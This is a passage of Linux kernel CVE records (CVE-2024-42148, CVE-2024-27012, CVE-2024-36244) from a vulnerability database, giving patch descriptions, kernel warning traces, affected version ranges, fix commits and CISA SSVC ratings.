            "url": "https://git.kernel.org/stable/c/f1313ea92f82451923e28ab45a4aaa0e70e80b98"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/b9ea38e767459111a511ed4fb74abc37db95a59d"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/134061163ee5ca4759de5c24ca3bd71608891ba7"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-42148",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T16:15:34.762201Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:34:34.889Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/net/ethernet/broadcom/bnx2x/bnx2x.h"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "cfb04472ce33bee2579caf4dc9f4242522f6e26e",
              "status": "affected",
              "version": "50f0a562f8cc9ed9d9f7f7380434c3c8646172d5",
              "versionType": "git"
            },
            {
              "lessThan": "cbe53087026ad929cd3950508397e8892a6a2a0f",
              "status": "affected",
              "version": "50f0a562f8cc9ed9d9f7f7380434c3c8646172d5",
              "versionType": "git"
            },
            {
              "lessThan": "8b17cec33892a66bbd71f8d9a70a45e2072ae84f",
              "status": "affected",
              "version": "50f0a562f8cc9ed9d9f7f7380434c3c8646172d5",
              "versionType": "git"
            },
            {
              "lessThan": "0edae06b4c227bcfaf3ce21208d49191e1009d3b",
              "status": "affected",
              "version": "50f0a562f8cc9ed9d9f7f7380434c3c8646172d5",
              "versionType": "git"
            },
            {
              "lessThan": "9504a1550686f53b0bab4cab31d435383b1ee2ce",
              "status": "affected",
              "version": "50f0a562f8cc9ed9d9f7f7380434c3c8646172d5",
              "versionType": "git"
            },
            {
              "lessThan": "f1313ea92f82451923e28ab45a4aaa0e70e80b98",
              "status": "affected",
              "version": "50f0a562f8cc9ed9d9f7f7380434c3c8646172d5",
              "versionType": "git"
            },
            {
              "lessThan": "b9ea38e767459111a511ed4fb74abc37db95a59d",
              "status": "affected",
              "version": "50f0a562f8cc9ed9d9f7f7380434c3c8646172d5",
              "versionType": "git"
            },
            {
              "lessThan": "134061163ee5ca4759de5c24ca3bd71608891ba7",
              "status": "affected",
              "version": "50f0a562f8cc9ed9d9f7f7380434c3c8646172d5",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/net/ethernet/broadcom/bnx2x/bnx2x.h"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "3.3"
            },
            {
              "lessThan": "3.3",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.318",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.280",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.222",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.163",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.98",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.39",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.9",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.318",
                  "versionStartIncluding": "3.3",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.280",
                  "versionStartIncluding": "3.3",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.222",
                  "versionStartIncluding": "3.3",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.163",
                  "versionStartIncluding": "3.3",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.98",
                  "versionStartIncluding": "3.3",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.39",
                  "versionStartIncluding": "3.3",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.9",
                  "versionStartIncluding": "3.3",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "3.3",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nbnx2x: Fix multiple UBSAN array-index-out-of-bounds\n\nFix UBSAN warnings that occur when using a system with 32 physical\ncpu cores or more, or when the user defines a number of Ethernet\nqueues greater than or equal to FP_SB_MAX_E1x using the num_queues\nmodule parameter.\n\nCurrently there is a read/write out of bounds that occurs on the array\n\"struct stats_query_entry query\" present inside the \"bnx2x_fw_stats_req\"\nstruct in \"drivers/net/ethernet/broadcom/bnx2x/bnx2x.h\".\nLooking at the definition of the \"struct stats_query_entry query\" array:\n\nstruct stats_query_entry query[FP_SB_MAX_E1x+\n         BNX2X_FIRST_QUEUE_QUERY_IDX];\n\nFP_SB_MAX_E1x is defined as the maximum number of fast path interrupts and\nhas a value of 16, while BNX2X_FIRST_QUEUE_QUERY_IDX has a value of 3\nmeaning the array has a total size of 19.\nSince accesses to \"struct stats_query_entry query\" are offset-ted by\nBNX2X_FIRST_QUEUE_QUERY_IDX, that means that the total number of Ethernet\nqueues should not exceed FP_SB_MAX_E1x (16). However one of these queues\nis reserved for FCOE and thus the number of Ethernet queues should be set\nto [FP_SB_MAX_E1x -1] (15) if FCOE is enabled or [FP_SB_MAX_E1x] (16) if\nit is not.\n\nThis is also described in a comment in the source code in\ndrivers/net/ethernet/broadcom/bnx2x/bnx2x.h just above the Macro definition\nof FP_SB_MAX_E1x. Below is the part of this explanation that it important\nfor this patch\n\n/*\n  * The total number of L2 queues, MSIX vectors and HW contexts (CIDs) is\n  * control by the number of fast-path status blocks supported by the\n  * device (HW/FW). Each fast-path status block (FP-SB) aka non-default\n  * status block represents an independent interrupts context that can\n  * serve a regular L2 networking queue. However special L2 queues such\n  * as the FCoE queue do not require a FP-SB and other components like\n  * the CNIC may consume FP-SB reducing the number of possible L2 queues\n  *\n  * If the maximum number of FP-SB available is X then:\n  * a. If CNIC is supported it consumes 1 FP-SB thus the max number of\n  *    regular L2 queues is Y=X-1\n  * b. In MF mode the actual number of L2 queues is Y= (X-1/MF_factor)\n  * c. If the FCoE L2 queue is supported the actual number of L2 queues\n  *    is Y+1\n  * d. The number of irqs (MSIX vectors) is either Y+1 (one extra for\n  *    slow-path interrupts) or Y+2 if CNIC is supported (one additional\n  *    FP interrupt context for the CNIC).\n  * e. The number of HW context (CID count) is always X or X+1 if FCoE\n  *    L2 queue is supported. The cid for the FCoE L2 queue is always X.\n  */\n\nHowever this driver also supports NICs that use the E2 controller which can\nhandle more queues due to having more FP-SB represented by FP_SB_MAX_E2.\nLooking at the commits when the E2 support was added, it was originally\nusing the E1x parameters: commit f2e0899f0f27 (\"bnx2x: Add 57712 support\").\nBack then FP_SB_MAX_E2 was set to 16 the same as E1x. However the driver\nwas later updated to take full advantage of the E2 instead of having it be\nlimited to the capabilities of the E1x. But as far as we can tell, the\narray \"stats_query_entry query\" was still limited to using the FP-SB\navailable to the E1x cards as part of an oversignt when the driver was\nupdated to take full advantage of the E2, and now with the driver being\naware of the greater queue size supported by E2 NICs, it causes the UBSAN\nwarnings seen in the stack traces below.\n\nThis patch increases the size of the \"stats_query_entry query\" array by\nreplacing FP_SB_MAX_E1x with FP_SB_MAX_E2 to be large enough to handle\nboth types of NICs.\n\nStack traces:\n\nUBSAN: array-index-out-of-bounds in\n       drivers/net/ethernet/broadcom/bnx2x/bnx2x_stats.c:1529:11\nindex 20 is out of range for type \u0027stats_query_entry [19]\u0027\nCPU: 12 PID: 858 Comm: systemd-network Not tainted 6.9.0-060900rc7-generic\n\t     #202405052133\nHardware name: HP ProLiant DL360 Gen9/ProLiant DL360 \n---truncated---"
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:24:09.076Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/cfb04472ce33bee2579caf4dc9f4242522f6e26e"
        },
        {
          "url": "https://git.kernel.org/stable/c/cbe53087026ad929cd3950508397e8892a6a2a0f"
        },
        {
          "url": "https://git.kernel.org/stable/c/8b17cec33892a66bbd71f8d9a70a45e2072ae84f"
        },
        {
          "url": "https://git.kernel.org/stable/c/0edae06b4c227bcfaf3ce21208d49191e1009d3b"
        },
        {
          "url": "https://git.kernel.org/stable/c/9504a1550686f53b0bab4cab31d435383b1ee2ce"
        },
        {
          "url": "https://git.kernel.org/stable/c/f1313ea92f82451923e28ab45a4aaa0e70e80b98"
        },
        {
          "url": "https://git.kernel.org/stable/c/b9ea38e767459111a511ed4fb74abc37db95a59d"
        },
        {
          "url": "https://git.kernel.org/stable/c/134061163ee5ca4759de5c24ca3bd71608891ba7"
        }
      ],
      "title": "bnx2x: Fix multiple UBSAN array-index-out-of-bounds",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-42148",
    "datePublished": "2024-07-30T07:46:41.203Z",
    "dateReserved": "2024-07-29T15:50:41.191Z",
    "dateUpdated": "2025-11-03T22:02:14.116Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-27012 (GCVE-0-2024-27012)

Vulnerability from cvelistv5 – Published: 2024-05-01 05:29 – Updated: 2025-11-04 17:17

Title

netfilter: nf_tables: restore set elements when delete set fails

Summary

In the Linux kernel, the following vulnerability has been resolved: netfilter: nf_tables: restore set elements when delete set fails From abort path, nft_mapelem_activate() needs to restore refcounters to the original state. Currently, it uses the set->ops->walk() to iterate over these set elements. The existing set iterator skips inactive elements in the next generation, this does not work from the abort path to restore the original state since it has to skip active elements instead (not inactive ones). This patch moves the check for inactive elements to the set iterator callback, then it reverses the logic for the .activate case which needs to skip active elements. Toggle next generation bit for elements when delete set command is invoked and call nft_clear() from .activate (abort) path to restore the next generation bit. The splat below shows an object in mappings memleak: [43929.457523] ------------[ cut here ]------------ [43929.457532] WARNING: CPU: 0 PID: 1139 at include/net/netfilter/nf_tables.h:1237 nft_setelem_data_deactivate+0xe4/0xf0 [nf_tables] [...] [43929.458014] RIP: 0010:nft_setelem_data_deactivate+0xe4/0xf0 [nf_tables] [43929.458076] Code: 83 f8 01 77 ab 49 8d 7c 24 08 e8 37 5e d0 de 49 8b 6c 24 08 48 8d 7d 50 e8 e9 5c d0 de 8b 45 50 8d 50 ff 89 55 50 85 c0 75 86 <0f> 0b eb 82 0f 0b eb b3 0f 1f 40 00 90 90 90 90 90 90 90 90 90 90 [43929.458081] RSP: 0018:ffff888140f9f4b0 EFLAGS: 00010246 [43929.458086] RAX: 0000000000000000 RBX: ffff8881434f5288 RCX: dffffc0000000000 [43929.458090] RDX: 00000000ffffffff RSI: ffffffffa26d28a7 RDI: ffff88810ecc9550 [43929.458093] RBP: ffff88810ecc9500 R08: 0000000000000001 R09: ffffed10281f3e8f [43929.458096] R10: 0000000000000003 R11: ffff0000ffff0000 R12: ffff8881434f52a0 [43929.458100] R13: ffff888140f9f5f4 R14: ffff888151c7a800 R15: 0000000000000002 [43929.458103] FS: 00007f0c687c4740(0000) GS:ffff888390800000(0000) knlGS:0000000000000000 [43929.458107] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [43929.458111] CR2: 00007f58dbe5b008 CR3: 0000000123602005 CR4: 00000000001706f0 [43929.458114] Call Trace: [43929.458118] <TASK> [43929.458121] ? __warn+0x9f/0x1a0 [43929.458127] ? nft_setelem_data_deactivate+0xe4/0xf0 [nf_tables] [43929.458188] ? report_bug+0x1b1/0x1e0 [43929.458196] ? handle_bug+0x3c/0x70 [43929.458200] ? exc_invalid_op+0x17/0x40 [43929.458211] ? nft_setelem_data_deactivate+0xd7/0xf0 [nf_tables] [43929.458271] ? nft_setelem_data_deactivate+0xe4/0xf0 [nf_tables] [43929.458332] nft_mapelem_deactivate+0x24/0x30 [nf_tables] [43929.458392] nft_rhash_walk+0xdd/0x180 [nf_tables] [43929.458453] ? __pfx_nft_rhash_walk+0x10/0x10 [nf_tables] [43929.458512] ? rb_insert_color+0x2e/0x280 [43929.458520] nft_map_deactivate+0xdc/0x1e0 [nf_tables] [43929.458582] ? __pfx_nft_map_deactivate+0x10/0x10 [nf_tables] [43929.458642] ? __pfx_nft_mapelem_deactivate+0x10/0x10 [nf_tables] [43929.458701] ? __rcu_read_unlock+0x46/0x70 [43929.458709] nft_delset+0xff/0x110 [nf_tables] [43929.458769] nft_flush_table+0x16f/0x460 [nf_tables] [43929.458830] nf_tables_deltable+0x501/0x580 [nf_tables]

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/86658fc7414d4b9e2…
	https://git.kernel.org/stable/c/e79b47a8615d42c68…

Impacted products

Vendor

Product

Version

Linux

Affected: 628bd3e49cba1c066228e23d71a852c23e26da73 , < 86658fc7414d4b9e25c2699d751034537503d637 (git)
Affected: 628bd3e49cba1c066228e23d71a852c23e26da73 , < e79b47a8615d42c68aaeb68971593333667382ed (git)
Affected: bc9f791d2593f17e39f87c6e2b3a36549a3705b1 (git)
Affected: 3c7ec098e3b588434a8b07ea9b5b36f04cef1f50 (git)
Affected: a136b7942ad2a50de708f76ea299ccb45ac7a7f9 (git)
Affected: 25aa2ad37c2162be1c0bc4fe6397f7e4c13f00f8 (git)
Affected: d60be2da67d172aecf866302c91ea11533eca4d9 (git)
Affected: dc7cdf8cbcbf8b13de1df93f356ec04cdeef5c41 (git)

Linux

Affected: 6.4
Unaffected: 0 , < 6.4 (semver)
Unaffected: 6.8.8 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-27012",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-06-14T18:56:10.473492Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-06-14T18:56:19.427Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-04T17:17:03.442Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/86658fc7414d4b9e25c2699d751034537503d637"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/e79b47a8615d42c68aaeb68971593333667382ed"
          },
          {
            "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DAMSOZXJEPUOXW33WZYWCVAY7Z5S7OOY/"
          },
          {
            "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4EZ6PJW7VOZ224TD7N4JZNU6KV32ZJ53/"
          },
          {
            "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GCBZZEC7L7KTWWAS2NLJK6SO3IZIL4WW/"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "net/netfilter/nf_tables_api.c",
            "net/netfilter/nft_set_bitmap.c",
            "net/netfilter/nft_set_hash.c",
            "net/netfilter/nft_set_pipapo.c",
            "net/netfilter/nft_set_rbtree.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "86658fc7414d4b9e25c2699d751034537503d637",
              "status": "affected",
              "version": "628bd3e49cba1c066228e23d71a852c23e26da73",
              "versionType": "git"
            },
            {
              "lessThan": "e79b47a8615d42c68aaeb68971593333667382ed",
              "status": "affected",
              "version": "628bd3e49cba1c066228e23d71a852c23e26da73",
              "versionType": "git"
            },
            {
              "status": "affected",
              "version": "bc9f791d2593f17e39f87c6e2b3a36549a3705b1",
              "versionType": "git"
            },
            {
              "status": "affected",
              "version": "3c7ec098e3b588434a8b07ea9b5b36f04cef1f50",
              "versionType": "git"
            },
            {
              "status": "affected",
              "version": "a136b7942ad2a50de708f76ea299ccb45ac7a7f9",
              "versionType": "git"
            },
            {
              "status": "affected",
              "version": "25aa2ad37c2162be1c0bc4fe6397f7e4c13f00f8",
              "versionType": "git"
            },
            {
              "status": "affected",
              "version": "d60be2da67d172aecf866302c91ea11533eca4d9",
              "versionType": "git"
            },
            {
              "status": "affected",
              "version": "dc7cdf8cbcbf8b13de1df93f356ec04cdeef5c41",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "net/netfilter/nf_tables_api.c",
            "net/netfilter/nft_set_bitmap.c",
            "net/netfilter/nft_set_hash.c",
            "net/netfilter/nft_set_pipapo.c",
            "net/netfilter/nft_set_rbtree.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "6.4"
            },
            {
              "lessThan": "6.4",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.8",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.8",
                  "versionStartIncluding": "6.4",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "6.4",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionStartIncluding": "4.19.316",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionStartIncluding": "5.4.262",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionStartIncluding": "5.10.188",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionStartIncluding": "5.15.121",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionStartIncluding": "6.1.36",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionStartIncluding": "6.3.10",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnetfilter: nf_tables: restore set elements when delete set fails\n\nFrom abort path, nft_mapelem_activate() needs to restore refcounters to\nthe original state. Currently, it uses the set-\u003eops-\u003ewalk() to iterate\nover these set elements. The existing set iterator skips inactive\nelements in the next generation, this does not work from the abort path\nto restore the original state since it has to skip active elements\ninstead (not inactive ones).\n\nThis patch moves the check for inactive elements to the set iterator\ncallback, then it reverses the logic for the .activate case which\nneeds to skip active elements.\n\nToggle next generation bit for elements when delete set command is\ninvoked and call nft_clear() from .activate (abort) path to restore the\nnext generation bit.\n\nThe splat below shows an object in mappings memleak:\n\n[43929.457523] ------------[ cut here ]------------\n[43929.457532] WARNING: CPU: 0 PID: 1139 at include/net/netfilter/nf_tables.h:1237 nft_setelem_data_deactivate+0xe4/0xf0 [nf_tables]\n[...]\n[43929.458014] RIP: 0010:nft_setelem_data_deactivate+0xe4/0xf0 [nf_tables]\n[43929.458076] Code: 83 f8 01 77 ab 49 8d 7c 24 08 e8 37 5e d0 de 49 8b 6c 24 08 48 8d 7d 50 e8 e9 5c d0 de 8b 45 50 8d 50 ff 89 55 50 85 c0 75 86 \u003c0f\u003e 0b eb 82 0f 0b eb b3 0f 1f 40 00 90 90 90 90 90 90 90 90 90 90\n[43929.458081] RSP: 0018:ffff888140f9f4b0 EFLAGS: 00010246\n[43929.458086] RAX: 0000000000000000 RBX: ffff8881434f5288 RCX: dffffc0000000000\n[43929.458090] RDX: 00000000ffffffff RSI: ffffffffa26d28a7 RDI: ffff88810ecc9550\n[43929.458093] RBP: ffff88810ecc9500 R08: 0000000000000001 R09: ffffed10281f3e8f\n[43929.458096] R10: 0000000000000003 R11: ffff0000ffff0000 R12: ffff8881434f52a0\n[43929.458100] R13: ffff888140f9f5f4 R14: ffff888151c7a800 R15: 0000000000000002\n[43929.458103] FS:  00007f0c687c4740(0000) GS:ffff888390800000(0000) knlGS:0000000000000000\n[43929.458107] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n[43929.458111] CR2: 00007f58dbe5b008 CR3: 0000000123602005 CR4: 00000000001706f0\n[43929.458114] Call Trace:\n[43929.458118]  \u003cTASK\u003e\n[43929.458121]  ? __warn+0x9f/0x1a0\n[43929.458127]  ? nft_setelem_data_deactivate+0xe4/0xf0 [nf_tables]\n[43929.458188]  ? report_bug+0x1b1/0x1e0\n[43929.458196]  ? handle_bug+0x3c/0x70\n[43929.458200]  ? exc_invalid_op+0x17/0x40\n[43929.458211]  ? nft_setelem_data_deactivate+0xd7/0xf0 [nf_tables]\n[43929.458271]  ? nft_setelem_data_deactivate+0xe4/0xf0 [nf_tables]\n[43929.458332]  nft_mapelem_deactivate+0x24/0x30 [nf_tables]\n[43929.458392]  nft_rhash_walk+0xdd/0x180 [nf_tables]\n[43929.458453]  ? __pfx_nft_rhash_walk+0x10/0x10 [nf_tables]\n[43929.458512]  ? rb_insert_color+0x2e/0x280\n[43929.458520]  nft_map_deactivate+0xdc/0x1e0 [nf_tables]\n[43929.458582]  ? __pfx_nft_map_deactivate+0x10/0x10 [nf_tables]\n[43929.458642]  ? __pfx_nft_mapelem_deactivate+0x10/0x10 [nf_tables]\n[43929.458701]  ? __rcu_read_unlock+0x46/0x70\n[43929.458709]  nft_delset+0xff/0x110 [nf_tables]\n[43929.458769]  nft_flush_table+0x16f/0x460 [nf_tables]\n[43929.458830]  nf_tables_deltable+0x501/0x580 [nf_tables]"
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T12:55:21.766Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/86658fc7414d4b9e25c2699d751034537503d637"
        },
        {
          "url": "https://git.kernel.org/stable/c/e79b47a8615d42c68aaeb68971593333667382ed"
        }
      ],
      "title": "netfilter: nf_tables: restore set elements when delete set fails",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-27012",
    "datePublished": "2024-05-01T05:29:37.765Z",
    "dateReserved": "2024-02-19T14:20:24.208Z",
    "dateUpdated": "2025-11-04T17:17:03.442Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-36244 (GCVE-0-2024-36244)

Vulnerability from cvelistv5 – Published: 2024-06-21 10:18 – Updated: 2025-11-03 21:55

Title

net/sched: taprio: extend minimum interval restriction to entire cycle too

Summary

In the Linux kernel, the following vulnerability has been resolved: net/sched: taprio: extend minimum interval restriction to entire cycle too It is possible for syzbot to side-step the restriction imposed by the blamed commit in the Fixes: tag, because the taprio UAPI permits a cycle-time different from (and potentially shorter than) the sum of entry intervals. We need one more restriction, which is that the cycle time itself must be larger than N * ETH_ZLEN bit times, where N is the number of schedule entries. This restriction needs to apply regardless of whether the cycle time came from the user or was the implicit, auto-calculated value, so we move the existing "cycle == 0" check outside the "if "(!new->cycle_time)" branch. This way covers both conditions and scenarios. Add a selftest which illustrates the issue triggered by syzbot.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/34d83c3e6e97867ae…
	https://git.kernel.org/stable/c/b939d1e04a90248b4…
	https://git.kernel.org/stable/c/91f249b01fe490fce…
	https://git.kernel.org/stable/c/fb66df20a7201e60f…

Impacted products

Vendor

Product

Version

Linux

Affected: b5b73b26b3ca34574124ed7ae9c5ba8391a7f176 , < 34d83c3e6e97867ae061d14eb52123404aab1cbc (git)
Affected: b5b73b26b3ca34574124ed7ae9c5ba8391a7f176 , < b939d1e04a90248b4cdf417b0969c270ceb992b2 (git)
Affected: b5b73b26b3ca34574124ed7ae9c5ba8391a7f176 , < 91f249b01fe490fce11fbb4307952ca8cce78724 (git)
Affected: b5b73b26b3ca34574124ed7ae9c5ba8391a7f176 , < fb66df20a7201e60f2b13d7f95d031b31a8831d3 (git)
Affected: 83bd58952b2b8543d8c48d1453975ab47a0a7504 (git)
Affected: 817ff50796c5e364c879596509f83fcba194bb6f (git)

Linux

Affected: 5.9
Unaffected: 0 , < 5.9 (semver)
Unaffected: 6.1.119 , ≤ 6.1.* (semver)
Unaffected: 6.6.33 , ≤ 6.6.* (semver)
Unaffected: 6.9.4 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T21:55:10.333Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/b939d1e04a90248b4cdf417b0969c270ceb992b2"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/91f249b01fe490fce11fbb4307952ca8cce78724"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/fb66df20a7201e60f2b13d7f95d031b31a8831d3"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-36244",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T17:09:44.304375Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:34:46.251Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "net/sched/sch_taprio.c",
            "tools/testing/selftests/tc-testing/tc-tests/qdiscs/taprio.json"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
